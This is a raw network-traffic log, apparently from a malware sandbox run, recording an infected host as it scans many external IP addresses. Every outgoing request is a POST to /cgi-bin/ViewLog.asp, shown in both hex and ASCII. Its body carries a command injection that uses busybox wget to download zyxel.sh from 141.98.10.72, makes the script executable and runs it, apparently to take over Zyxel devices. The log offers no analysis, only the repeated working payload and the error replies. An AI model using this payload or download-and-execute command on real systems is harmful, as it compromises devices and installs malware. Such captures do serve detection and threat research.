Feb 14, 2024 09:30:32.873807907 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:33.132143974 CET	388	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 09:14:35 GMT Server: DNVRS-Webs Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
728	192.168.2.15	42754	94.182.205.168	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:33.168400049 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
729	192.168.2.15	34192	85.239.242.248	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:33.635446072 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:33.761769056 CET	88	IN	HTTP/1.0 400 Bad Request Data Raw: 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 74 6f 20 61 6e 20 48 54 54 50 53 20 73 65 72 76 65 72 2e 0a Data Ascii: Client sent an HTTP request to an HTTPS server.

Session ID	Source IP	Source Port	Destination IP	Destination Port
730	192.168.2.15	49412	62.4.28.224	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:33.705473900 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:33.901966095 CET	134	IN	HTTP/1.1 403 Forbidden Content-Type: application/json;charset=utf-8 Content-Length: 0 Server: Jetty(9.1.z-SNAPSHOT)

Session ID	Source IP	Source Port	Destination IP	Destination Port
731	192.168.2.15	36992	31.136.63.190	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:33.711038113 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:34.328566074 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:35.576313972 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:38.232228041 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:43.352264881 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:53.335695028 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:14.071417093 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:55.030227900 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
732	192.168.2.15	41462	31.136.180.92	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:33.711901903 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:34.328550100 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:35.576309919 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:38.232141018 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:43.352138042 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:53.335678101 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:14.071338892 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:55.030092001 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
733	192.168.2.15	43700	31.136.124.214	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:33.730652094 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:34.424436092 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:35.768475056 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:38.488281012 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:43.864187002 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:54.615719080 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:16.119205952 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:59.126137018 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
734	192.168.2.15	33430	94.253.117.5	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:33.747340918 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:33.985714912 CET	324	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 Date: Wed, 14 Feb 2024 08:30:33 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
735	192.168.2.15	59600	31.200.42.180	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:33.756351948 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
736	192.168.2.15	51820	62.29.126.110	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:33.757536888 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
737	192.168.2.15	55902	94.121.122.244	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:33.759243011 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
738	192.168.2.15	34884	95.169.26.226	80

Timestamp	Bytes transferred	Direction	Data
